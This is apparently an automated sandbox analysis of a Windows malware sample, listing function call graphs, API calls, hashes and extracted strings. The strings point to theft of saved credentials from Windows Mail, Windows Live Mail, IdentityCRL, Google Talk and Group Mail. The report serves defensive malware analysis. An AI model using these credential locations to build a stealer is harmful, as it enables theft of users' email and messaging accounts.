                                            • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0044430B
                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                              • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                            • memset.MSVCRT ref: 00444379
                                            • memset.MSVCRT ref: 00444394
                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                            • strlen.MSVCRT ref: 004443DB
                                            • _strcmpi.MSVCRT ref: 00444401
                                            Strings
                                            • Store Root, xrefs: 004443A5
                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail

                                            Control-flow Graph

                                            control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                            APIs
                                            • memset.MSVCRT ref: 0040F567
                                            • memset.MSVCRT ref: 0040F57F
                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                            • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                            • String ID:

                                            Control-flow Graph

                                            control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                            APIs
                                            • memset.MSVCRT ref: 004037EB
                                            • memset.MSVCRT ref: 004037FF
                                              • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                              • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                            • strchr.MSVCRT ref: 0040386E
                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                            • strlen.MSVCRT ref: 00403897
                                            • sprintf.MSVCRT ref: 004038B7
                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                            • String ID: %s@yahoo.com

                                            Control-flow Graph

                                            control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                            APIs
                                            • memset.MSVCRT ref: 00403504
                                            • memset.MSVCRT ref: 0040351A
                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                            • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                            • _mbscat.MSVCRT ref: 0040356D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscatmemset$Close_mbscpystrlen
                                            • String ID: InstallPath$Software\Group Mail$fb.dat

                                            Control-flow Graph

                                            control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 364 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->364 365 40cd59-40cd60 DeleteObject 363->365 365->364
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                            • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                            • DeleteObject.GDI32(?), ref: 0040CD5A
                                            • memset.MSVCRT ref: 0040CD96
                                            • LoadIconA.USER32(00000065), ref: 0040CDA6
                                            • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                            • String ID:

                                            Control-flow Graph

                                            APIs
                                            • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                              • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                              • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                              • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProtectVirtual
                                            • String ID:
                                            • API String ID: 2099061454-0
                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                            • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                            • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                            • memset.MSVCRT ref: 00408620
                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                            • memset.MSVCRT ref: 00408671
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                            • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                            Strings
                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                            • String ID: Software\Google\Google Talk\Accounts
                                            • API String ID: 1366857005-1079885057
                                            • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                            • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Cursor_mbsicmpqsort
                                            • String ID: /nosort$/sort
                                            • API String ID: 882979914-1578091866
                                            • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                            • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                              • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                              • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                              • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                              • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProtectVirtual
                                            • String ID:
                                            • API String ID: 2099061454-0
                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                            • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                            • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                            APIs
                                            • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                            • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProcProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 2152742572-0
                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                            • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                            • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                            APIs
                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,74DF0A60,?,00000000), ref: 00410D1C
                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                            • memset.MSVCRT ref: 00410E10
                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                            • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                            • API String ID: 889583718-2036018995
                                            • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                            • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                            APIs
                                            • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                            • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                            • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                            • LockResource.KERNEL32(00000000), ref: 00410CA1
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID:
                                            • API String ID: 3473537107-0
                                            • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                            • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                            • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                            • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                            APIs
                                            • memset.MSVCRT ref: 004109F7
                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                              • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                            • memset.MSVCRT ref: 00410A32
                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                            • String ID:
                                            • API String ID: 3143880245-0
                                            • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                            • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                            • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D5C
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D7A
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D98
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408DA8
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@
                                            • String ID:
                                            • API String ID: 1033339047-0
                                            • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                            • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                            • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                            • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                            APIs
                                            • malloc.MSVCRT ref: 00406F4C
                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,74DF0A60,00407A43,00000001,?,00000000,74DF0A60,00407DBD,00000000,?,?), ref: 00406F64
                                            • free.MSVCRT ref: 00406F6D
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: freemallocmemcpy
                                            • String ID:
                                            • API String ID: 3056473165-0
                                            • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                            • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                            • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                            • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                            APIs
                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                            • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CreateFontIndirect_mbscpymemset
                                            • String ID: Arial
                                            • API String ID: 3853255127-493054409
                                            • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                            • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                            • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                            • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                            APIs
                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: strlen$_strcmpimemset
                                            • String ID: /stext
                                            • API String ID: 520177685-3817206916
                                            • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                            • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                            APIs
